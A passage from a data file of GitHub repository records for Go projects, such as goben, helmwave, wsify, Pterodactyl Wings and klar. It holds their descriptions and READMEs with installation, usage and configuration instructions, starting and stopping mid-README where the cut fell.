There is no special requirement for running it.\n- You can also download a binary release from https://github.com/udhos/goben/releases\n\n# Install\n\n## With Go Modules (since Go 1.11)\n\n git clone https://github.com/udhos/goben ;# clone outside GOPATH\n cd goben\n go test ./goben\n CGO_ENABLED=0 go install ./goben\n\n## Without Go Modules (before Go 1.11)\n\n go get github.com/wcharczuk/go-chart\n go get gopkg.in/yaml.v2\n go get github.com/udhos/goben\n go install github.com/udhos/goben/goben\n\n# Usage\n\nMake sure ~/go/bin is in your shell PATH.\n\nStart server:\n\n server$ goben\n\nStart client:\n\n client$ goben -hosts 1.1.1.1 ;# 1.1.1.1 is server's address\n\n# Command-line Options\n\nFind several supported command-line switches by running 'goben -h':\n\n```\n$ goben -h\n2021/02/28 00:43:28 goben version 0.6 runtime go1.16 GOMAXPROCS=12 OS=linux arch=amd64\nUsage of goben:\n -ascii\n plot ascii chart (default true)\n -cert string\n TLS cert file (default \"cert.pem\")\n -chart string\n output filename for rendering chart on client\n '%d' is parallel connection index to host\n '%s' is hostname:port\n example: -chart chart-%d-%s.png\n -connections int\n number of parallel connections (default 1)\n -csv string\n output filename for CSV exporting test results on client\n '%d' is parallel connection index to host\n '%s' is hostname:port\n example: -csv export-%d-%s.csv\n -defaultPort string\n default port (default \":8080\")\n -export string\n output filename for YAML exporting test results on client\n '%d' is parallel connection index to host\n '%s' is hostname:port\n example: -export export-%d-%s.yaml\n -hosts value\n comma-separated list of hosts\n you may append an optional port to every host: host[:port]\n -key string\n TLS key file (default \"key.pem\")\n -listeners value\n comma-separated list of listen addresses\n you may prepend an optional host to every port: [host]:port\n -localAddr string\n bind specific local address:port\n example: -localAddr 127.0.0.1:2000\n -maxSpeed float\n bandwidth limit in mbps (0 means unlimited)\n -passiveClient\n suppress client writes\n -passiveServer\n suppress server writes\n -reportInterval string\n periodic report interval\n unspecified time unit defaults to second (default \"2s\")\n -tcpReadSize int\n TCP read buffer size in bytes (default 1000000)\n -tcpWriteSize int\n TCP write buffer size in bytes (default 1000000)\n -tls\n set to false to disable TLS (default true)\n -totalDuration string\n test total duration\n unspecified time unit defaults to second (default \"10s\")\n -udp\n run client in UDP mode\n -udpReadSize int\n UDP read buffer size in bytes (default 64000)\n -udpWriteSize int\n UDP write buffer size in bytes (default 64000)\n```\n\n# Example\n\nServer side:\n\n $ goben\n 2018/06/28 15:04:26 goben version 0.3 runtime go1.11beta1 GOMAXPROCS=1\n 2018/06/28 15:04:26 connections=1 defaultPort=:8080 listeners=[\":8080\"] hosts=[]\n 2018/06/28 15:04:26 reportInterval=2s totalDuration=10s\n 2018/06/28 15:04:26 server mode (use -hosts to switch to client mode)\n 2018/06/28 15:04:26 serve: spawning TCP listener: :8080\n 2018/06/28 15:04:26 serve: spawning UDP listener: :8080\n\nClient side:\n\n $ goben -hosts localhost\n 2018/06/28 15:04:28 goben version 0.3 runtime go1.11beta1 GOMAXPROCS=1\n 2018/06/28 15:04:28 connections=1 defaultPort=:8080 listeners=[\":8080\"] hosts=[\"localhost\"]\n 2018/06/28 15:04:28 reportInterval=2s totalDuration=10s\n 2018/06/28 15:04:28 client mode, tcp protocol\n 2018/06/28 15:04:28 open: opening tcp 0/1: 
localhost:8080\n 2018/06/28 15:04:28 handleConnectionClient: starting 0/1 [::1]:8080\n 2018/06/28 15:04:28 handleConnectionClient: options sent: {2s 10s 50000 50000 false 0}\n 2018/06/28 15:04:28 clientReader: starting: 0/1 [::1]:8080\n 2018/06/28 15:04:28 clientWriter: starting: 0/1 [::1]:8080\n 2018/06/28 15:04:30 0/1 report clientReader rate: 13917 Mbps 34793 rcv/s\n 2018/06/28 15:04:30 0/1 report clientWriter rate: 13468 Mbps 33670 snd/s\n 2018/06/28 15:04:32 0/1 report clientReader rate: 14044 Mbps 35111 rcv/s\n 2018/06/28 15:04:32 0/1 report clientWriter rate: 13591 Mbps 33978 snd/s\n 2018/06/28 15:04:34 0/1 report clientReader rate: 12934 Mbps 32337 rcv/s\n 2018/06/28 15:04:34 0/1 report clientWriter rate: 12517 Mbps 31294 snd/s\n 2018/06/28 15:04:36 0/1 report clientReader rate: 13307 Mbps 33269 rcv/s\n 2018/06/28 15:04:36 0/1 report clientWriter rate: 12878 Mbps 32196 snd/s\n 2018/06/28 15:04:38 0/1 report clientWriter rate: 13330 Mbps 33325 snd/s\n 2018/06/28 15:04:38 0/1 report clientReader rate: 13774 Mbps 34436 rcv/s\n 2018/06/28 15:04:38 handleConnectionClient: 10s timer\n 2018/06/28 15:04:38 workLoop: 0/1 clientWriter: write tcp [::1]:42130->[::1]:8080: use of closed network connection\n 2018/06/28 15:04:38 0/1 average clientWriter rate: 13157 Mbps 32892 snd/s\n 2018/06/28 15:04:38 clientWriter: exiting: 0/1 [::1]:8080\n 2018/06/28 15:04:38 workLoop: 0/1 clientReader: read tcp [::1]:42130->[::1]:8080: use of closed network connection\n 2018/06/28 15:04:38 0/1 average clientReader rate: 13595 Mbps 33989 rcv/s\n 2018/06/28 15:04:38 clientReader: exiting: 0/1 [::1]:8080\n 2018/06/28 15:04:38 input:\n 14038 \u2524 \u256d\u2500\u2500\u2500\u2500\u256e\n 13939 \u2524\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256f \u2570\u256e\n 13840 \u253c \u2570\u2500\u256e\n 13741 \u2524 \u2570\u256e \u256d\u2500\u2500\n 13641 \u2524 \u2570\u256e \u256d\u2500\u2500\u2500\u256f\n 13542 \u2524 \u2570\u2500\u256e \u256d\u2500\u2500\u256f\n 13443 \u2524 \u2570\u256e \u256d\u2500\u2500\u2500\u256f\n 13344 \u2524 \u2570\u2500\u256e \u256d\u2500\u2500\u2500\u256f\n 13245 \u2524 \u2570\u256e \u256d\u2500\u2500\u2500\u256f\n 13146 \u2524 \u2570\u2500\u256e \u256d\u2500\u2500\u2500\u256f\n 13047 \u2524 \u2570\u2500\u2500\u2500\u2500\u256f\n 12948 \u2524\n 2018/06/28 15:04:38 output:\n 13585 \u2524 \u256d\u2500\u2500\u2500\u2500\u256e\n 13489 \u2524\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256f \u2570\u256e\n 13393 \u253c \u2570\u2500\u256e\n 13297 \u2524 \u2570\u256e \u256d\u2500\u2500\n 13201 \u2524 \u2570\u256e \u256d\u2500\u2500\u2500\u256f\n 13105 \u2524 \u2570\u2500\u256e \u256d\u2500\u2500\u256f\n 13009 \u2524 \u2570\u256e \u256d\u2500\u2500\u2500\u256f\n 12914 \u2524 \u2570\u2500\u256e \u256d\u2500\u2500\u2500\u256f\n 12818 \u2524 \u2570\u256e \u256d\u2500\u2500\u2500\u256f\n 12722 \u2524 \u2570\u2500\u256e \u256d\u2500\u2500\u2500\u256f\n 12626 \u2524 \u2570\u2500\u2500\u2500\u2500\u256f\n 12530 \u2524\n 2018/06/28 15:04:38 handleConnectionClient: closing: 0/1 [::1]:8080\n\n# TLS\n\nFor TLS, a server-side certificate is required:\n\n $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout key.pem -out cert.pem\n\nIf the certificate is available, goben server listens on TLS socket. 
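A minimal sketch of a TLS run, assuming the `cert.pem`/`key.pem` generated above sit in goben's working directory (flag names and defaults are taken from the `goben -h` output earlier in this README; the exact invocation is an illustration, not an upstream example):\n\n    server$ goben -cert cert.pem -key key.pem ;# TLS is enabled by default (-tls true)\n\n    client$ goben -hosts 1.1.1.1 ;# 1.1.1.1 is the server's address, as in the earlier example\n\n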
If goben does not find the certificate files, it falls back to plain TCP.\n\n--x--\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Echosong/beego_blog", "link": "https://github.com/Echosong/beego_blog", "tags": ["golang", "layui", "beego", "blog"], "stars": 504, "description": "A clean, good-looking personal blog system built with beego and layui, aimed at Go beginners", "lang": "Go", "repo_lang": "", "readme": "# beego_Blog\n\nA personal blog system built with the Go language and the beego framework, with a front end laid out with layui.\n\nFor a related CMS, see [beego cms](https://github.com/Echosong/beego_element_cms)\n\n## Build and installation instructions:\n\n1 . Set GOPATH (the installation directory)\n\n    $ export GOPATH=/path/to/\n\n2 . Download and install\n\n    $ go get github.com/Echosong/beego_blog\n\n> This project uses beego 1.x; upgrading via go get -u github.com/astaxie/beego is recommended\n\n4 . Load the database\n\n    Create a db_beego database in MySQL and import db_beego.sql from the project root\n\n5 . Edit the app.conf configuration\n\n    #MySQL host\n    dbhost = localhost\n\n    #MySQL port\n    dbport = 3306\n\n    #MySQL username\n    dbuser = root\n\n    #MySQL password\n    dbpassword =\n\n    #MySQL database name\n    dbname = db_beego\n\n    #MySQL table prefix\n    dbprefix = tb_\n\n6 . Run\n\n    cd into the beego_blog directory and run\n    $ bee run\n\n7 . Browser demo\n\nhttp://localhost:8099 (front end)\n\nhttp://localhost:8099/admin/login (admin back end)\n\n    Account: admin  Password: 123456\n\n8 . Contact\n\n    qq: 313690636\n\n    qq group: 571627871\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "helmwave/helmwave", "link": "https://github.com/helmwave/helmwave", "tags": ["helm", "kubernetes", "chart"], "stars": 504, "description": "\ud83c\udf0a Helmwave is the true release manager", "lang": "Go", "repo_lang": "", "readme": "

\n \n

\n\n

Helmwave\n\n[codecov, CodeFactor, GitHub license, and GitHub release badges]\n
\n\n\n\ud83c\udf0a Helmwave is **[helm3](https://github.com/helm/helm/)-native** tool for deploy your Helm Charts.\nHelmWave is like docker-compose for helm.\n\n> We focus on speed execution, tiny size, pretty debugging.\n\nWith helmwave you will become a superhero:\n\n- Deploy multiple environments by one step\n- Separate values for environments\n- Common values for apps\n- Keep a directory of chart value files\n- Maintain changes in version control\n- Template values\n- Step by Step deployment (depends_on, allow_failure)\n- Live tracking kubernetes resources with kubedog\n- Fetch data from external datasource like vault, aws sm\n- ... and much more!\n\n## \ud83d\udcd6 [Documentation](https://docs.helmwave.app)\n\nDocumentation available at https://docs.helmwave.app\n\n\n## Community, discussion, contribution, and support\n\n- \n- [kanban](https://github.com/orgs/helmwave/projects/3)\n- [contribution guide](https://github.com/helmwave/helmwave/blob/main/CONTRIBUTING.md)\n- [security and vulnerabilities](https://github.com/helmwave/helmwave/blob/main/SECURITY.md)\n\n\n## Stargazers over time\n\n[![Stargazers over time](https://starchart.cc/helmwave/helmwave.svg)](https://starchart.cc/helmwave/helmwave)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "zhangpeihao/gortmp", "link": "https://github.com/zhangpeihao/gortmp", "tags": ["rtmp", "rtmp-server", "rtmp-player", "rtmpdump", "rtmp-protocol", "go"], "stars": 504, "description": "Implement RTMP protocol by golang", "lang": "Go", "repo_lang": "", "readme": "# GoRTMP [![Build Status](https://secure.travis-ci.org/zhangpeihao/gortmp.png)](http://travis-ci.org/zhangpeihao/gortmp)\n======\n\nRTMP protocol implementation.\n\n## Spec: \n* RTMP - http://www.adobe.com/devnet/rtmp.html\n* AMF0 - http://download.macromedia.com/pub/labs/amf/amf0_spec_121207.pdf\n* AMF3 - http://download.macromedia.com/pub/labs/amf/amf3_spec_121207.pdf\n\n\n## Todo:\n* Inbound side\n\n## Examples:\n\n```golang\n// To connect FMS server\nobConn, err := rtmp.Dial(url, handler, 100)\n\n// To connect\nerr = obConn.Connect()\n\n// When new stream created, handler event OnStreamCreated() would been called\nfunc (handler *TestOutboundConnHandler) OnStreamCreated(stream rtmp.OutboundStream) {\n\t// To play\n\terr = stream.Play(*streamName, nil, nil, nil)\n\t// Or publish\n\terr = stream.Publish(*streamName, \"live\")\n}\n\n// To publish data\nstream.PublishAudioData(data, deltaTimestamp)\n// or\nstream.PublishVideoData(data, deltaTimestamp)\n// or\nstream.PublishData(tagHeader.TagType, data, deltaTimestamp)\n\n// You can close stream by\nstream.Close()\n\n// You can close connection by\nobConn.Close()\n```", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "FairwindsOps/nova", "link": "https://github.com/FairwindsOps/nova", "tags": ["helm", "kubernetes", "updates", "fairwinds-official", "hacktoberfest"], "stars": 504, "description": "Find outdated or deprecated Helm charts running in your cluster.", "lang": "Go", "repo_lang": "", "readme": "
[Nova logo]\n
\n\nNova scans your cluster for installed Helm charts, then cross-checks them against\nall known Helm repositories. If it finds an updated version of the chart you're using,\nor notices your current version is deprecated, it will let you know.\n\nNova can also scan your cluster for out of date container images. Find out more in the [docs](https://nova.docs.fairwinds.com).\n\n## Documentation\n\nCheck out the [documentation at docs.fairwinds.com](https://nova.docs.fairwinds.com)\n\n\n## Join the Fairwinds Open Source Community\n\nThe goal of the Fairwinds Community is to exchange ideas, influence the open source roadmap,\nand network with fellow Kubernetes users.\n[Chat with us on Slack](https://join.slack.com/t/fairwindscommunity/shared_invite/zt-e3c6vj4l-3lIH6dvKqzWII5fSSFDi1g)\nor\n[join the user group](https://www.fairwinds.com/open-source-software-user-group) to get involved!\n\n\n \"Love\n\n\n## Other Projects from Fairwinds\n\nEnjoying Nova? Check out some of our other projects:\n* [Polaris](https://github.com/FairwindsOps/Polaris) - Audit, enforce, and build policies for Kubernetes resources, including over 20 built-in checks for best practices\n* [Goldilocks](https://github.com/FairwindsOps/Goldilocks) - Right-size your Kubernetes Deployments by compare your memory and CPU settings against actual usage\n* [Pluto](https://github.com/FairwindsOps/Pluto) - Detect Kubernetes resources that have been deprecated or removed in future versions\n* [rbac-manager](https://github.com/FairwindsOps/rbac-manager) - Simplify the management of RBAC in your Kubernetes clusters\n\nOr [check out the full list](https://www.fairwinds.com/open-source-software?utm_source=nova&utm_medium=nova&utm_campaign=nova)\n## Fairwinds Insights\nIf you're interested in running Nova in multiple clusters,\ntracking the results over time, integrating with Slack, Datadog, and Jira,\nor unlocking other functionality, check out\n[Fairwinds Insights](https://fairwinds.com/pricing),\na platform for auditing and enforcing policy in Kubernetes clusters.\n\n\n \"Fairwinds\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mdempsky/maligned", "link": "https://github.com/mdempsky/maligned", "tags": [], "stars": 504, "description": "Tool to detect Go structs that would take less memory if their fields were sorted.", "lang": "Go", "repo_lang": "", "readme": "**Deprecated:** Use https://pkg.go.dev/golang.org/x/tools/go/analysis/passes/fieldalignment instead.\n\nInstall:\n\n go get github.com/mdempsky/maligned\n\nUsage:\n\n maligned cmd/compile/internal/gc cmd/link/internal/ld\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "alash3al/wsify", "link": "https://github.com/alash3al/wsify", "tags": ["golang", "go", "redis-channel", "websockets", "backend", "realtime", "realtime-messaging", "pusher", "pubsub", "tiny", "pub", "websocket-service", "webhook", "topic"], "stars": 503, "description": "Just a tiny, simple and real-time self-hosted pub/sub messaging service", "lang": "Go", "repo_lang": "", "readme": "Websocketify (wsify) v2.0 [![StackShare](https://img.shields.io/badge/tech-stack-0690fa.svg?style=flat)](https://stackshare.io/alash3al/wsify)\n=========================\n> Just a tiny, simple and realtime pub/sub messaging service\n\n\n![Quick Demo](https://i.imgur.com/jxyejg0.gif)\n\nWhy\n====\n> I wanted to create a tiny solution that can replace `pusher` and similar 
services and learning more about the realtime world, so I started this project.\n\nFeatures\n================\n- No dependencies, just a single binary!\n- Light and Tiny.\n- Event-Driven Design `webhooks`.\n- A client can listen on any resource.\n- You control whether a client is allowed to `connect`, `subscribe`, `unsubscribe` using any programming language!\n- A client defines itself using `key` via the url query param e.g. `?key=123`.\n- Send messages to only certain users.\n\n\nInstallation\n==============\n- **Docker ?** > `docker run --network host alash3al/wsify -listen :8080 -webhook \"http://localhost/wsify.php\"` \n- **Binary ?** > goto the [releases](https://github.com/alash3al/wsify/releases) page and download yours.\n- **From Source ?** > `go get -u github.com/alash3al/wsify`\n\nQuestions\n==========\n\n### (1)- How can a client/device connect to the websocket service?\n> by simply connecting to the following endpoint `ws://your.wsify.service:port/subscribe`\n\n### (2)- How can a client subscribe to a certain channel(s)/topic(s)?\n> after connecting to the main websocket service `/subscribe`, you can send a simple json payload with `commands` to ask wsify to `subscribe`/`unsubscribe` you to/from any channel/topic you want!\n\n### (3)- What is the command format?\n>\n```json\n{\n\t\"action\": \"subscribe\",\n\t\"value\": \"testchan\"\n}\n\n```\n\n### (4)- Can I control the client command so I can allow/disallow certain users?\n> Yes, each client can define itself using a query param `?key=client1`; this key will be passed to the `webhook` endpoint\nalong with the event being executed, and here is the event format:\n```javascript\n{\n\t// one of the following: connect|subscribe|unsubscribe|disconnect\n\t\"action\": \"subscribe\",\n\n\t// the channel if provided\n\t\"value\": \"testchan\",\n\n\t// the key provided by the client\n\t\"key\": \"client1\"\n}\n```\n\n### (5)- How can I publish a message to e.g. `testchan`?\n> Just send a POST request to `/publish` with the following format:\n```javascript\n{\n\t// the channel you want to publish to\n\t\"channel\": \"testchan\",\n\n\t// the data to be sent (any format)\n\t\"payload\": \"testchan\",\n\n\t// array of clients \"keys\" (if you want certain clients only to receive the message)\n\t\"to\": []\n}\n```\ne.g.\n```bash\ncurl -X POST \\\n\t-H \"Content-Type: application/json\" \\\n\t-d '{\"payload\": \"hi from the terminal\", \"channel\": \"testchan\"}' \\\n\thttp://localhost:4040/publish\n```\n\n### (6)- Can I skip the webhook events for testing?\n> Yes, `wsify --events=\"\"`; empty events means \"NO WEBHOOK, WSIFY!\"\n\n### (7)- How can I secure the publish endpoint, so no one except me can publish?\n> Easy :) Just change the endpoint to something more secure and hard to guess; it is an alternative to access tokens
etc, `wsify --publish=\"/broadcasteiru6chefoh1Yee0MohJ2um5eepaephies3zonai0Cae7quaeb\"`\n\n### (8)- What about other options?\n> `wsify --help` will help you !\n\n### (9)- What is the websocket client used in demos?\n> [Simple Websocket Client](https://chrome.google.com/webstore/detail/simple-websocket-client/pfdhoblngboilpfeibdedpjgfnlcodoo)\n\n### (10)- How I can use it over SSl/TLS with Nginx?\n> You can use proxy, add this lines on your Nginx configration\n```\n location /websocket/subscribe {\n proxy_pass http://localhost:4040/subscribe;\n proxy_http_version 1.1;\n proxy_set_header Upgrade $http_upgrade;\n proxy_set_header Connection \"Upgrade\";\n }\n```\nNow you can call websocket by `wss://yourdomain.com/websocket/subscribe` \n\n\n![Quick Demo2](https://i.imgur.com/f8xVwJU.gif)\n\nAuthor\n=============\nThis project has been created by [Mohamed Al Ashaal](http://github.com/alash3al) a Crazy Gopher ^^!\n\nContribution\n=============\n- Fork the Repo\n- Create a feature branch\n- Push your changes to the created branch\n- Create a pull request.\n\nLicense\n=============\nWsify is open-sourced software licensed under the [MIT License](LICENSE).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "pterodactyl/wings", "link": "https://github.com/pterodactyl/wings", "tags": ["golang", "docker", "go", "pterodactyl", "compiled"], "stars": 503, "description": "The server control plane for Pterodactyl Panel. Written from the ground-up with security, speed, and stability in mind.", "lang": "Go", "repo_lang": "", "readme": "[![Logo Image](https://cdn.pterodactyl.io/logos/new/pterodactyl_logo.png)](https://pterodactyl.io)\n\n![Discord](https://img.shields.io/discord/122900397965705216?label=Discord&logo=Discord&logoColor=white)\n![GitHub Releases](https://img.shields.io/github/downloads/pterodactyl/wings/latest/total)\n[![Go Report Card](https://goreportcard.com/badge/github.com/pterodactyl/wings)](https://goreportcard.com/report/github.com/pterodactyl/wings)\n\n# Pterodactyl Wings\n\nWings is Pterodactyl's server control plane, built for the rapidly changing gaming industry and designed to be\nhighly performant and secure. Wings provides an HTTP API allowing you to interface directly with running server\ninstances, fetch server logs, generate backups, and control all aspects of the server lifecycle.\n\nIn addition, Wings ships with a built-in SFTP server allowing your system to remain free of Pterodactyl specific\ndependencies, and allowing users to authenticate with the same credentials they would normally use to access the Panel.\n\n## Sponsors\n\nI would like to extend my sincere thanks to the following sponsors for helping find Pterodactyl's development.\n[Interested in becoming a sponsor?](https://github.com/sponsors/matthewpi)\n\n| Company | About |\n|-----------------------------------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|\n| [**WISP**](https://wisp.gg) | Extra features. |\n| [**Aussie Server Hosts**](https://aussieserverhosts.com/) | No frills Australian Owned and operated High Performance Server hosting for some of the most demanding games serving Australia and New Zealand. 
|\n| [**BisectHosting**](https://www.bisecthosting.com/) | BisectHosting provides Minecraft, Valheim and other server hosting services with the highest reliability and lightning fast support since 2012. |\n| [**MineStrator**](https://minestrator.com/) | Looking for the most highend French hosting company for your minecraft server? More than 24,000 members on our discord trust us. Give us a try! |\n| [**Skynode**](https://www.skynode.pro/) | Skynode provides blazing fast game servers along with a top-notch user experience. Whatever our clients are looking for, we're able to provide it! |\n| [**VibeGAMES**](https://vibegames.net/) | VibeGAMES is a game server provider that specializes in DDOS protection for the games we offer. We have multiple locations in the US, Brazil, France, Germany, Singapore, Australia and South Africa. |\n| [**Pterodactyl Market**](https://pterodactylmarket.com/) | Pterodactyl Market is a one-and-stop shop for Pterodactyl. In our market, you can find Add-ons, Themes, Eggs, and more for Pterodactyl. |\n| [**UltraServers**](https://ultraservers.com/) | Deploy premium games hosting with the click of a button. Manage and swap games with ease and let us take care of the rest. We currently support Minecraft, Rust, ARK, 7 Days to Die, Garys MOD, CS:GO, Satisfactory and others. |\n| [**Realms Hosting**](https://realmshosting.com/) | Want to build your Gaming Empire? Use Realms Hosting today to kick start your game server hosting with outstanding DDOS Protection, 24/7 Support, Cheap Prices and a Custom Control Panel. | |\n\n## Documentation\n\n* [Panel Documentation](https://pterodactyl.io/panel/1.0/getting_started.html)\n* [Wings Documentation](https://pterodactyl.io/wings/1.0/installing.html)\n* [Community Guides](https://pterodactyl.io/community/about.html)\n* Or, get additional help [via Discord](https://discord.gg/pterodactyl)\n\n## Reporting Issues\n\nPlease use the [pterodactyl/panel](https://github.com/pterodactyl/panel) repository to report any issues or make\nfeature requests for Wings. 
In addition, the [security policy](https://github.com/pterodactyl/panel/security/policy) listed\nwithin that repository also applies to Wings.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tmc/grpc-websocket-proxy", "link": "https://github.com/tmc/grpc-websocket-proxy", "tags": ["grpc", "grpc-gateway", "websocket", "proxy"], "stars": 503, "description": "A proxy to transparently upgrade grpc-gateway streaming endpoints to use websockets", "lang": "Go", "repo_lang": "", "readme": "# grpc-websocket-proxy\n\n[![GoDoc](https://godoc.org/github.com/tmc/grpc-websocket-proxy/wsproxy?status.svg)](http://godoc.org/github.com/tmc/grpc-websocket-proxy/wsproxy)\n\nWrap your grpc-gateway mux with this helper to expose streaming endpoints over websockets.\n\nOn the wire this uses newline-delimited json encoding of the messages.\n\nUsage:\n```diff\n\tmux := runtime.NewServeMux()\n\topts := []grpc.DialOption{grpc.WithInsecure()}\n\tif err := echoserver.RegisterEchoServiceHandlerFromEndpoint(ctx, mux, *grpcAddr, opts); err != nil {\n\t\treturn err\n\t}\n-\thttp.ListenAndServe(*httpAddr, mux)\n+\thttp.ListenAndServe(*httpAddr, wsproxy.WebsocketProxy(mux))\n```\n\n\n# wsproxy\n import \"github.com/tmc/grpc-websocket-proxy/wsproxy\"\n\nPackage wsproxy implements a websocket proxy for grpc-gateway backed services\n\n## Usage\n\n```go\nvar (\n\tMethodOverrideParam = \"method\"\n\tTokenCookieName = \"token\"\n)\n```\n\n#### func WebsocketProxy\n\n```go\nfunc WebsocketProxy(h http.Handler) http.HandlerFunc\n```\nWebsocketProxy attempts to expose the underlying handler as a bidi websocket\nstream with newline-delimited JSON as the content encoding.\n\nThe HTTP Authorization header is either populated from the\nSec-Websocket-Protocol field or by a cookie. 
The cookie name is specified by the\nTokenCookieName value.\n\nexample:\n\n Sec-Websocket-Protocol: Bearer, foobar\n\nis converted to:\n\n Authorization: Bearer foobar\n\nMethod can be overwritten with the MethodOverrideParam get parameter in the\nrequested URL\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mingrammer/go-todo-rest-api-example", "link": "https://github.com/mingrammer/go-todo-rest-api-example", "tags": ["example", "rest-api", "tutorial", "practice-golang"], "stars": 503, "description": ":books: A RESTful API example for simple todo application with Go", "lang": "Go", "repo_lang": "", "readme": "# Go Todo REST API Example\nA RESTful API example for simple todo application with Go\n\nIt is a just simple tutorial or example for making simple RESTful API with Go using **gorilla/mux** (A nice mux library) and **gorm** (An ORM for Go)\n\n## Installation & Run\n```bash\n# Download this project\ngo get github.com/mingrammer/go-todo-rest-api-example\n```\n\nBefore running API server, you should set the database config with yours or set the your database config with my values on [config.go](https://github.com/mingrammer/go-todo-rest-api-example/blob/master/config/config.go)\n```go\nfunc GetConfig() *Config {\n\treturn &Config{\n\t\tDB: &DBConfig{\n\t\t\tDialect: \"mysql\",\n\t\t\tUsername: \"guest\",\n\t\t\tPassword: \"Guest0000!\",\n\t\t\tName: \"todoapp\",\n\t\t\tCharset: \"utf8\",\n\t\t},\n\t}\n}\n```\n\n```bash\n# Build and Run\ncd go-todo-rest-api-example\ngo build\n./go-todo-rest-api-example\n\n# API Endpoint : http://127.0.0.1:3000\n```\n\n## Structure\n```\n\u251c\u2500\u2500 app\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 app.go\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 handler // Our API core handlers\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 common.go // Common response functions\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 projects.go // APIs for Project model\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 tasks.go // APIs for Task model\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 model\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 model.go // Models for our application\n\u251c\u2500\u2500 config\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 config.go // Configuration\n\u2514\u2500\u2500 main.go\n```\n\n## API\n\n#### /projects\n* `GET` : Get all projects\n* `POST` : Create a new project\n\n#### /projects/:title\n* `GET` : Get a project\n* `PUT` : Update a project\n* `DELETE` : Delete a project\n\n#### /projects/:title/archive\n* `PUT` : Archive a project\n* `DELETE` : Restore a project \n\n#### /projects/:title/tasks\n* `GET` : Get all tasks of a project\n* `POST` : Create a new task in a project\n\n#### /projects/:title/tasks/:id\n* `GET` : Get a task of a project\n* `PUT` : Update a task of a project\n* `DELETE` : Delete a task of a project\n\n#### /projects/:title/tasks/:id/complete\n* `PUT` : Complete a task of a project\n* `DELETE` : Undo a task of a project\n\n## Todo\n\n- [x] Support basic REST APIs.\n- [ ] Support Authentication with user for securing the APIs.\n- [ ] Make convenient wrappers for creating API handlers.\n- [ ] Write the tests for all APIs.\n- [x] Organize the code with packages\n- [ ] Make docs with GoDoc\n- [ ] Building a deployment process \n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "optiopay/klar", "link": "https://github.com/optiopay/klar", "tags": ["security", 
"clair", "severity-vulnerabilities", "docker-registry", "docker-image", "security-audit"], "stars": 503, "description": "Integration of Clair and Docker Registry", "lang": "Go", "repo_lang": "", "readme": "# Klar\nIntegration of Clair and Docker Registry (supports both Clair API v1 and v3)\n\nKlar is a simple tool to analyze images stored in a private or public Docker registry for security vulnerabilities using Clair https://github.com/coreos/clair. Klar is designed to be used as an integration tool so it relies on enviroment variables. It's a single binary which requires no dependencies.\n\nKlar serves as a client which coordinates the image checks between the Docker registry and Clair.\n\n## Binary installation\n\nThe simplest way is to download the latest release (for OSX and Linux) from https://github.com/optiopay/klar/releases/ and put the binary in a folder in your `PATH` (make sure it has execute permission).\n\n## Installation from source code\n\nMake sure you have Go language compiler installed and configured https://golang.org/doc/install\n\nThen run\n\n go get github.com/optiopay/klar\n\nmake sure your Go binary folder is in your `PATH` (e.g. `export PATH=$PATH:/usr/local/go/bin`)\n\n\n## Usage\n\nKlar process returns if `0` if the number of detected high severity vulnerabilities in an image is less than or equal to a threshold (see below) and `1` if there were more. It will return `2` if an error has prevented the image from being analyzed.\n\nKlar can be configured via the following environment variables:\n\n* `CLAIR_ADDR` - address of Clair server. It has a form of `protocol://host:port` - `protocol` and `port` default to `http` and `6060` respectively and may be omitted. You can also specify basic authentication in the URL: `protocol://login:password@host:port`.\n\n* `CLAIR_OUTPUT` - severity level threshold, vulnerabilities with severity level higher than or equal to this threshold\nwill be outputted. Supported levels are `Unknown`, `Negligible`, `Low`, `Medium`, `High`, `Critical`, `Defcon1`.\nDefault is `Unknown`.\n\n* `CLAIR_THRESHOLD` - how many outputted vulnerabilities Klar can tolerate before returning `1`. Default is `0`.\n\n* `CLAIR_TIMEOUT` - timeout in minutes before Klar cancels the image scanning. Default is `1`\n\n* `DOCKER_USER` - Docker registry account name.\n\n* `DOCKER_PASSWORD` - Docker registry account password.\n\n* `DOCKER_TOKEN` - Docker registry account token. (Can be used in place of `DOCKER_USER` and `DOCKER_PASSWORD`)\n\n* `DOCKER_INSECURE` - Allow Klar to access registries with bad SSL certificates. Default is `false`. Clair will\nneed to be booted with `-insecure-tls` for this to work.\n\n* `DOCKER_TIMEOUT` - timeout in minutes when trying to fetch layers from a docker registry\n\n* `DOCKER_PLATFORM_OS` - The operating system of the Docker image. Default is `linux`. This only needs to be set if the image specified references a Docker ManifestList instead of a usual manifest.\n\n* `DOCKER_PLATFORM_ARCH` - The architecture the Docker image is 